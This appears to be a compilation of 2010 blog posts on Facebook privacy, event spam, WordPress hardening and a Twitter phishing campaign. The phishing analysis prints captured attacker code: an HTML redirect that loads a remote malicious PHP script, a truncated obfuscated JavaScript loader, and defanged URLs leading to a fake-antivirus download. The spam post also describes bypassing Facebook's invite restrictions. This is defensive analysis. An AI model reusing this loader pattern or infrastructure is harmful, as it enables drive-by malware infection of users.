Security Through Obscurity and Privacy in Practice

Yesterday, security researcher Ron Bowes published a 2.8GB database of information collected from public Facebook pages. These pages list all users whose privacy settings enable a public search listing for their profile. Bowes wrote a program to scan through the listings and save the first name, last name, and profile URI of each user (though only if their last name began with a Latin character). The database includes this data for about 171 million profiles.

On the one hand, I wasn’t entirely surprised by this news – it was only a matter of time before someone started building up such a dataset. I’ve previously mentioned that developer Pete Warden had planned on releasing public profile information for 210 million Facebook users until the company’s legal team stepped in. But nothing technical prevented someone else from attempting the task and posting data without notice. I imagine Facebook may not be too happy with Bowes’ data, but I’m not going to delve into the legal issues surrounding page scraping.

However, the event did remind me of a related issue I’ve pondered over the last few months: the notion of “security through obscurity” as it relates to privacy issues.

I’ve often referenced the work of danah boyd, a social media researcher that I highly respect. In a talk earlier this year at WWW2010 entitled, ”Privacy and Publicity in the Context of Big Data,” she outlines several excellent considerations on handling massive collections of data about people. One in particular that’s worth remembering in the context of public Facebook information: “Just because data is accessible doesn’t mean that using it is ethical.Michael Zimmer at the University of Wisconsin-Milwaukee has made similar arguments, noting that mass harvesting of Facebook data goes against the expectations of users who maintain a public profile for discovery by friends, among other issues. Knowing some of the historical issues with academic research involving human subjects, I tend to agree with these positions.

But a related point from boyd’s talk concerns me from a security perspective: “Security Through Obscurity Is a Reasonable Strategy.” As an example, she notes that people talking in public settings may still discuss personal matters, but they rely on being one conversation among hundreds to maintain privacy. If people knew other people were specifically listening to their conversation, they would adjust the topic accordingly.

In this “offline” example, taking advantage of obscurity makes sense. But boyd applies the same idea online: “You may think that they shouldn’t rely on being obscure, but asking everyone to be paranoid about everyone else in the world is a very very very unhealthy thing…. You may be able to stare at everyone who walks by but you don’t. And in doing so, you allow people to maintain obscurity. What makes the Internet so different? Why is it OK to demand the social right to stare at everyone just because you can?”

I would respond that at least three aspects make the Internet different. First, you rarely have anyway of knowing if someone is “staring at you” online. Public content on Facebook gets transferred to search engines, application developers, and individual web surfers every day without any notification to the creators of that content. Proxies and anonymizers can spoof or remove information that might otherwise help identify the source of a request. And as computing power increases each day, tracking down publicly accessible resources becomes ever easier.

Second, the nature of online data means that recording, parsing, and redistributing it tends to be far simpler than in the offline world. If I want to record someone’s in-person conversations, it’s theoretically possible that I could acquire a small recording device, place it in a convenient location, save the audio from it, type up a transcript of the person’s words, then send it to another person to read. But if I want to record someone’s conversations on Twitter (as an example), I can have all them in a format understandable to various computer-based analysis tools in just a few clicks. In fact, I could setup an automated system which monitors the person’s Twitter account and updates me whenever certain words of interest appear. Add the fact that this is true of any public Twitter account, and the capabilities for online monitoring grow enormously.

Finally, while digital content is in some ways more ephemeral than other media, web data tends to persist well beyond a creator’s ability to control. Search engine caches, archival sites, and user redistribution all contribute to keeping content alive. If someone records a spoken conversation on a tape, the tape can be destroyed before copies are made. But if you (or a friend of yours) post a sentence or photo on a social networking site, you may never be able to erase it fully from the Internet. Several celebrities have learned this the hard way lately.

From a privacy perspective, I wholeheartedly agree with boyd that we can’t expect users to become paranoid sysadmins. The final point of my own guide to Facebook privacy admonished, “You Have to Live Your Life.” But from a security perspective, I know that there will always be people and automated systems which are “staring at you” on the Internet. I’ve seen time and again that if data is placed where others can access it online, someone will access it – perhaps even unintentionally (Google indexes many pages that were obviously not meant for public consumption).

In my opinion, the only way to offer any setup online which resembles the sort of “private in public” context boyd described requires some sort of a walled garden, such as limiting your Facebook profile to logged in users. That alone still doesn’t provide the same degree of privacy, since many fake profiles exist and applications may still have access to your data. But while “security through obscurity” (or perhaps more accurately, privacy through obscurity) may be a decent strategy in many “offline” social situations, it simply can’t be relied on to protect users and data online.

Facebook users are starting to discover this firsthand. I’ve seen several reactions to Bowes’ release that characterize it as a security issue or privacy issue, and people have seemed quite surprised that building such a dataset was even possible. Yet it really shouldn’t come as a surprise to someone familiar with current technology and ways of accessing Facebook data. And it won’t be the last time we see someone make use of “public” data in surprising ways. Some of these uses may be unfortunate or unethical (see above), but we’ve often seen technology steam ahead in pursuit of fortune, and the web has many users with differing ideas on ethics. Reversing the effects of such actions may prove impossible, which is why I would argue we need to prevent them by not trusting obscurity for protection. And how do we balance this perspective to avoid unhealthy paranoia? I’m honestly not sure – but if content is publicly accessible online without any technical limitations, we can hardly consider it immune to publicizing.

Spam via Facebook Events Highlights Ongoing Challenges

Earlier today, I received an invitation to a Facebook event from “Giovanna” – someone I’d never heard of and certainly never added as a friend. The invite came as a bit of a surprise, since my profile was fairly locked down. While anyone could search for it, all profile information was set to “Friends Only,” and sending messages or making friend requests was limited to “Friends of Friends.” None of my friends seem to know Giovanna, and her profile is probably fake anyway.

The event title proclaimed “iPhone Testers Needed!” and might be enticing to users who want an iPhone. While the event page included more information on the supposed testing program, the invite was followed by a message from the event creator. Once you’re on the guest list for a Facebook event, the event administrators can send out Facebook messages you’ll receive, regardless of privacy settings. This particular message (which also arrived in my e-mail inbox due to notifications settings) included a link to the iPhone opportunity, which unsurprisingly was a typical “offer” page that required me to submit personal information and try out some service before I could get my fancy new phone.

I began investigating how this all happened. When you create a Facebook event and try to invite people, you’ll only see a list of your friends to choose from. But it turns out that on the backend, nothing prevents you from submitting requests directly to Facebook with other people’s Facebook IDs. In my testing, I’ve been able to send event invitations to other users even if we’re not friends and they have tight privacy settings. I’m guessing that using this technique to invite more than a few people could raise a spam alert, but I’m not sure. Also, an event invitation does not give the event creator increased access to any profile information of guests, but as already noted, it does let event administrators send messages to people they might otherwise not be able to contact.

I’m sure Facebook will take action soon to clamp down on this particular loophole, so I think it unlikely we’ll see it exploited too widely. (The iPhone testing event currently has around 1800 guests – significant, but tiny compared to other Facebook scams.) But it does demonstrate the sort of challenges Facebook is having to handle as their network and power expand. Several years ago, when the site was used for little besides keeping in touch with college classmates and other offline friends, Facebook was seen as mostly spam-free, in contrast to services like Myspace. Now that applications, social gaming friends, and corporate brands have all become integral parts of the Facebook experience, black hat marketers keep finding new ways to spread links among users. And worse, those tricks can often be used to spread malware as well.

I do think that Facebook wants to avoid annoying users with spam, and works to prevent your inbox on the site from becoming as flooded as a typical e-mail account. But a network of 500 million people presents a very enticing target, and we’ll keep seeing new scam ideas pop up as Facebook expands and adds features. In the mean time, continue to be wary of any links  promising a glamorous reward for free.

Secure Your WordPress By Learning From My Mistakes

Several weeks ago, I managed to create a small ruckus on Twitter by issuing a warning about a possible WordPress vulnerability. I was rather embarrassed to eventually discover that the actual problem related to a backdoor still on my server from a previous hack. This was not my first lesson in WordPress security, but it was certainly a memorable one.

I first created this blog in 2007 after finding basic CSRF issues in the first publicly available OpenSocial application. At the time, I admittedly knew very little about application security (not that I know much now!), but I was interested in many aspects of building online social networking systems, and that led me to research security issues more and more. Over time, this blog grew and several other projects hosted on the same server fell by the wayside. As my understanding of security also grew, I found some of my sites hacked a few times, and I undertook a number of steps to secure this WordPress installation.

That maintenance contributed to the confidence I had in my warning on Twitter – malicious scripts kept popping up in my site’s footer, and the only apparent problem were some suspicious requests to a particular WordPress interface. I had looked gone through all my plug-ins (the apparent source of previous attacks), double-checked my permissions, changed passwords, etc. I finally did a thorough sweep of every single folder on my site, and lurking in an upload folder, I found a sophisticated PHP backdoor.

I’m guessing that file originally been placed during a much older attack and I’d simply missed it until now. Since deleting it and taking even more steps to protect my blog, I’ve not had any more trouble. I wouldn’t presume to think this site is 100% secure and I’ve never claimed to be an expert on application security, much less WordPress or PHP security, but I’m now quite confident that I’ve taken enough precautions to avoid most attacks.

That leads me to the following list of steps I’ve performed to harden this particular WordPress site. If you’ve not taken the time to ensure your blog is secure, this may be a good guide for you to start with. I’m indebted to many websites on WordPress security, and while I would want to link to all of them, I’m honestly not sure of all the specific ones I’ve drawn from and it would take a while to piece them together. A quick search will bring up many helpful recommendations, and I encourage you to check them out in addition to these tips.

  • Stay updated. Running the most current version of WordPress is probably the most important step. My host offers automatic updating for my installations. Also, be sure to keep your plug-ins updated as well.
  • Protect other sites. If you have more than one website running on the same server, make sure all of them are secure. One vulnerable application can compromise others. If you have sites that you don’t maintain, consider deleting them or locking them down to avoid future problems.
  • Scan through all of your folders. If you haven’t done this in a while, now would be a good time. Look through what files are present and keep an eye out for anything suspicious. Check your WordPress files against a fresh download to make sure they line up.
  • Scan through all of your permissions. This should be fairly easy with an FTP program that displays permissions settings. With rare exception, I keep files at chmod 644 and folders at chmod 755.
  • Periodically change passwords. Definitely modify your passwords if you’ve recovered from an attack. Remember to change your database password (and corresponding line in wp-config.php) as well as account passwords.
  • Use modified passphrases. This is one tip I don’t see often, but it’s one of my favorite tricks. Rather than simply jumbling characters into a password you have trouble remembering, start with a sentence. Not something terribly common, but something familiar to you. Pick one with at least six words in it. Take the whole sentence, with capitalization and punctuation, and add some complexity – append some numbers and punctuation at the beginning or end, and maybe change a few letters to numbers (such as “3″ for “e”). You should then have a very strong “password” that’s much easier to remember. Many websites and applications will let you use spaces and hundreds of characters in your password. But once again: avoid common phrases, include at least six words, and don’t just use a sentence without adding some numbers and special characters.
  • Check your users table in the database. I’ve seen attacks before that lead to the creation of an administrative account which is then hidden from the list of users in the web-based control panel. I’ve never quite understood why hidden users should be allowed, but that could be part of the attack to begin with. Anyway, just to be careful, I like to look at the actual table in the database and see if any other accounts have administrative privileges.
  • Double-check and clean up all plug-ins. I’ve deleted every plug-in I don’t use, and I try to keep all of my active plug-ins current. If you have a plug-in that’s no longer maintained or hasn’t been updated in a long time, you should probably check and see if a newer replacement is available. In my experience, plug-ins can be one of the weakest points in your WordPress installation. It’s kind of like a certain other site I know well – Facebook itself tends to be pretty secure, but you can often access data through vulnerable Facebook applications.
  • Add HTTP authentication to your wp-admin folder. This is covered in many places online so I’ll not recap specific steps here. And I’ll add that I realize this is not a silver bullet – basic authentication sends passwords in cleartext (so don’t use the same credentials as your WordPress account), and the traffic is not encrypted if you’re not using SSL/TLS. But adding another login prompt for the admin panel adds friction and may repel less-determined attackers. (This tip is obviously geared towards those who don’t have user accounts for non-admins.)
  • Move wp-config.php to a folder not as easily accessible. You can place wp-config.php one folder above your WordPress install; under my hosting setup, this location does not correspond to any public website folder. I also set mine to chmod 644 after changing it.
  • Rename your admin account. Several means exist to do this; I simply edited the record in the database.
  • Change your table prefix. This can be a bit of a hassle, but plug-ins exist (see below) to help. I’ll admit that I still need to check this one off my own list; long story.
  • Disable interfaces such as XML-RPC if you don’t use them. I don’t doubt that the programmers behind WordPress have worked hard to secure these interfaces, but I simply don’t like having another avenue of accessing administrative functions. And I think it’s not a bad idea to disable features you don’t actually need.
  • Use security tools. I installed the WP Security Scan plug-in after reading about it on WordPress’ own hardening guide.
  • Keep monitoring your site. I make a habit of loading up my homepage ever so often, hitting “View Source,” and scanning through the HTML. If I ever see an unfamiliar script or iframe element, I look closer.

That’s my personal list of WordPress security tips, based on many helpful resources and my own experiences of getting hacked. These certainly don’t apply to everyone, more could be added, and your mileage may vary, but hopefully this will help others avoid some of the problems I encountered. Be sure to look at other people’s advice as well and watch out for any WordPress security news.

Interesting New Twitter Phish Can Lead to Bad Places

I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and I which is totally possible. :-) Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>
<title></title>

<html><head>
</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/[‘ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, it 404′s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:

hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&i=JcmridQaq/ykgRj4UMpOy5Ec&e=4

This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.

Share and Enjoy


FacebookTwitterDeliciousDiggStumbleUponAdd to favoritesEmailRSS


Facebook Privacy & Security Guide Updated to v2.2

I have updated the Facebook Privacy & Security Guide to version 2.2 over on SocialMediaSecurity.com.  If you’re not familiar with the guide it is an easy to use guide which helps you set the recommended privacy and security settings on your Facebook account.  It’s free, printable and meant to be shared.

This update includes details on all the recent changes to Facebook’s privacy settings that went live May 26, 2010.  I have also included more information on “Instant Personalization”, removing yourself from “Platform”, and how your public information can be accessed via the Facebook Graph API.  Note that you may not have these settings enabled on your Facebook profile…yet.  They are slowly being rolled out to the Facebook user base and may take a few weeks.  Please share with friends, family and others!

Download the latest version of the Facebook Privacy & Security Guide here.

Share and Enjoy


FacebookTwitterDeliciousDiggStumbleUponAdd to favoritesEmailRSS


My Thoughts on the New Facebook Privacy Controls

Ever since I started the Facebook Privacy & Security Guide back in October 2008 I knew that Facebook’s privacy settings were confusing for the average user.  Many of my concerns back then centered around friends and family that had no idea there were even privacy settings to configure on Facebook.  It has also never been in Facebook’s financial interest to *really* show you how to protect the information you post.  These are all reasons was why I started the guide and hopefully over the last few years it has helped spread some awareness on how to control the information you post a little better.  Working on the guide has been frustrating at times because Facebook would make settings more confusing, remove settings that were useful and then bring them back again in some other form.  In the latest versions of the guide I often wondered how I was going to fit all the settings and their explanations into a two-sided handout.  The handout format has always been important to me so it could be easily distributed. :-)

Jumping forward to today we see yet another iteration of these settings.  I don’t have the settings on my Facebook account yet so I haven’t updated the guide but I have read some of the information already out there.  The EFF has a good post up about the new settings.  They even have a YouTube video showing you the changes and their recommendations.  The other post you should read is one by theharmonyguy who, as always, has very good analysis of these settings and Facebook overall.

My thoughts are pretty much along the same lines as the EFF and others.  However, I will say that no matter what changes Facebook makes to their privacy settings they *will* find ways to use your information to make money.  This is Mark Zuckerberg’s business model and that won’t change anytime soon.  I will leave you with a fantastic quote that I think sums up all the media drama leading up to these new privacy controls.  This is a quote from Bruce Schneier.  It’s from an article he did for Forbes regarding statements that “Privacy is Dead”:

“It’s just not true. People, including the younger generation, still care about privacy. Yes, they’re far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. But they take steps to protect their privacy and vociferously complain when they feel it violated. They’re not technically sophisticated about privacy and make mistakes all the time, but that’s mostly the fault of companies and Web sites that try to manipulate them for financial gain.”

Share and Enjoy


FacebookTwitterDeliciousDiggStumbleUponAdd to favoritesEmailRSS


Facebook Backtracks on Privacy Controls and Public Information

Facebook CEO Mark Zuckerberg held a press conference today announcing significant changes to the site’s privacy settings. The latest updates come after weeks of debate and criticism over Facebook’s handling of user information. Though it may take several days or weeks to roll out the new controls, an official privacy guide provides a summary of how they work. Full details are still rolling in, but certain aspects are already clear.

First, the new interface for making many changes appears to be much more streamlined. This should be a welcome change to those confused by the previous litany of options. The primary privacy page displays a table with columns for “Everyone,” “Friends of Friends,” and “Friends Only,” with rows for several categories of content. This table not only establishes settings for certain bits of profile information; it also lets users set defaults for new content shared.

Second, Facebook has removed the requirement that “connections,” such as your list of friends and the pages you “like,” always be publicly available information. A secondary page will provide access controls for certain groups of these connections, as well as who can friend you, send you messages, or see your profile in search results.

Third, users will have new options related to third-party applications that integrate with Facebook. The company had previously announced a granular permissions model for applications, and developers are in the process of transitioning to the new setup. Those permissions will now be reflected in the privacy settings, though how that will look is not yet clear. (Also, Facebook’s privacy guide assures users that applications can only request “information that’s needed for them to work,” but that’s up to developers.) Facebook is also re-instating an option to completely opt-out from the Facebook Platform. This setting had been available prior to changes last fall. However, it now appears that this opt-out will also be the only way to avoid public content being indexed by search engines.

Zuckerberg promised an “easy” way to opt-out of the controversial instant personalization program, which lets certain third-party websites automatically identify Facebook visitors, but the feature remains opt-out. Many of the other privacy settings are also still opt-out in that the site defaults appear to remain the same, presented as “Recommended” when a new user checks them.

I’ve been concerned about the tone of some Facebook responses to recent privacy concerns, and today’s presentation by Zuckerberg was no exception. He noted that the company had not seen any noticeable impact on site usage lately, and according to one report commented, “Perhaps the personal privacy preferences of liberal advocacy groups and DC politicians don’t match with those of the general public.” That may be true, though I think politicians or privacy advocates have a deeper understanding of recent changes than the general public. Still, this sort of remark comes across as at best somewhat irritated and at worst rather arrogant. It also probably won’t win over any liberal advocacy groups or DC politicians. (For the record, I don’t fall into either category.)

Other aspects of the announcements lead me to wonder how much Facebook truly understands the rising worries over the site’s handling of privacy issues.  Zuckerberg emphasized the site’s focus on sharing, that users want to share, and his belief that people want to share more openly. The default privacy options clearly reflect this belief, positioning Facebook as a site generally intended for public sharing.

But I think Zuckerberg is confusing the desire to share easily or freely and the desire to share publicly. Several researchers have explored how people approach privacy, and people constantly use services such as Facebook to post content they would not want distributed to the entire Internet. We’ve become accustomed to the idea of being private in public, since our offline conversations in public settings are not recorded and indexed for anyone to search. What would be the harm to users if content was private by default, but could be opened to the public if the author wanted that? After all, this is how Facebook operated for the first few years of its existence – and it likely played a significant role in the site’s growth.

Of course, while an opt-in approach may help many users, Facebook wants users to share more openly. More public content provides more value for other services that might integrate with Facebook, extending the site’s reach and influence. That’s part of why I find it difficult to simply accept Zuckerberg’s notion that most people are moving towards public sharing on their own: regardless of what individuals think, Facebook itself certainly has an opinion on how much you should share.

And that’s the real question – how much you share, not whether you share. I’ve never been opposed to making it easier for users to share content. But I do have a problem when a site that was built on sharing with a limited audience reorganizes to make that same type of sharing more difficult than fully public sharing – an activity that carries far more potential dangers, both social and otherwise.

Facebook has built an unprecedented audience of users who give it significant trust. I’m glad to see the company making welcome changes which assist users who actively care about privacy controls. But I remain concerned that the company’s overall perspective still reflects questionable ideas, such as the notion most people are not concerned about privacy, and either fails to recognize the company’s role as a trend-setter or ingenuously downplays it. That’s not a personal attack on Zuckerberg, whom I’ve never met, or anyone else at Facebook. It’s simply my evaluation of the service’s direction based on recent features and public relations. And I think Facebook owes its users much better.

Quitfacebookday.com happens on May 31, 2010 – Should you quit, too?

It seems like maybe I talk too much about Facebook security. But it’s a growing issue in the news these days. As you can see from the image next to this blog post on my website, one of the most searched terms in Google is now “How do I delete my Facebook account?” (In fact, as of today, if you type “Delete” into a Google search, the top suggestion is “Facebook account”) So, I’m debating quitting Facebook on May 31 with the others who are disgusted with the site’s disregard for privacy and security. (See http://www.quitfacebookday.com)

My reasons include:

(1) You can’t seem to depend on anything you put there to be kept private – more due to constant policy changes than hackers;

(2) Facebook is now one of the biggest sources of phishing scams on the Internet, which are causing real losses;

(3) On any given day, the privacy of your data may depend on your FRIENDS’ settings, not just yours;

(4) Very few people are able to decipher the privacy settings to choose meaningful rules, which leaves them exposed – even me;

(5) Facebook shares your data with other sites (through the Open Graph API, the Like Button or Instant Personalization) in ways that can cause embarrassment and lead to identity theft;

(6) Facebook does not appear to be abiding by its agreement with the Privacy Commissioner or Canada to improve its handling of private information.(http://www.priv.gc.ca/media/nr-c/2009/let_090827_e.cfm)

Arguments against quitting Facebook include:

(1) All the “hip” young people say “Privacy is dead. Build a bridge and get over it…”

– Chanting this may make them feel good, but doesn’t change the fact that the easiest place to be scammed or have your password stolen is through social media sites that have very weak security and authentication. People must still care about their privacy, if only to ensure that persecution and other politically motivated abuses don’t victimize innocent people – it’s a slippery slope.  Privacy commissioners have a very difficult job these days. But it is an increasingly important one.

(2) How will I connect to friends and family without Facebook?

– How did you do it in 2003? It also depends on whether you use Facebook for “reading” or “writing” or “both”. If you just like to “see” what’s going on, you can use Twitter, with the caveat that you need to be careful of those short URLs that can take you to dangerous places. But tools like Brizzly.com can expand the links for you, so you’ll know where they are leading you. However, if you like to write lots of personal details of your life, and only want to share it with friends, that’s the biggest challenge right now – because even Facebook doesn’t provide assurance that your private posts won’t be shared with people you might not want to see them. There aren’t many tools that are widely used and can do this. But they are coming. So, maybe it’s better to wait.

(3) One person quitting from a group of 400 Million isn’t going to make a difference.

– It’s true that the numbers make this initiative look futile. So, for most people, quitting won’t make a difference to anyone. But if you are a person of authority, especially a security or privacy authority, your actions can show the people around you that this is a serious issue. Parents telling their kids that they are quitting – and why – may or may not have an impact (depending on whether the ear-plugs are in or not).

Public figures like Leo Laporte  can have a significant effect on their followers. (Click  HERE for the story which includes a link to the WikiHow page on how to quit Facebook)

As a security consultant who has been following this trend, I am asking people to take it seriously. If you are a security manager in a company, you can also have an influence on your co-workers, as long as they don’t see you as being heavy-handed, or crying “wolf” – which may be unavoidable in some cases.

(4) If all the security and privacy advocates quit Facebook, who will counsel those who still use it to let them know about the risks in their own “element”?  Good question. I don’t have an answer to that one. I may leave a Facebook page up (which is different from a personal profile). That way, people can still reach me and see what I have to say, publicly, and maybe understand why I no longer have a personal profile… and maybe they shouldn’t either.

What will the future of social networking look like?

I believe something will come along that is more secure than Facebook, and will provide the connections we need – without as much risk. But it may take a while. There is an initiative called Diaspora (http://www.joindiaspora.com/), which has this very intent. While its initial incarnation seems to have a few serious weaknesses of its own, this is the kind of thing that needs to happen to combine a great vision for social networking with a level of trust that can be sustained.

So, what do you think?

(1) Should I quit Facebook on May 31? or sooner?

(2) Will you quit Facebook?

Feel free to comment below. (NOTE: If all you plan to say is “Privacy is Dead”, get ready for a flaming arrow!)

Here’s how to delete your facebook account – http://www.wikihow.com/Permanently-Delete-a-Facebook-Account


I am now offering monthly briefings, tailored to organizations that want to build and sustain security awareness for staff. Just because your security team is too busy to do its own training and awareness doesn’t mean you can’t have an economical way to address human security risks. Please call or email me at the coordinates below…

Scott Wright

The Streetwise Security Coach

Join the Streetwise Security Zone at:
http://www.streetwise-security-zone.com/join.html

Phone: 1-613-693-0997
Email: scott@streetwise-security-zone.com
Twitter ID: http://www.twitter.com/streetsec

To receive weekly security tips and other notices about helpful content available on this site, please make sure you are on my list by clicking HERE, and entering your name and email address.

 

 

Site Meter

1 2 3 4 5 22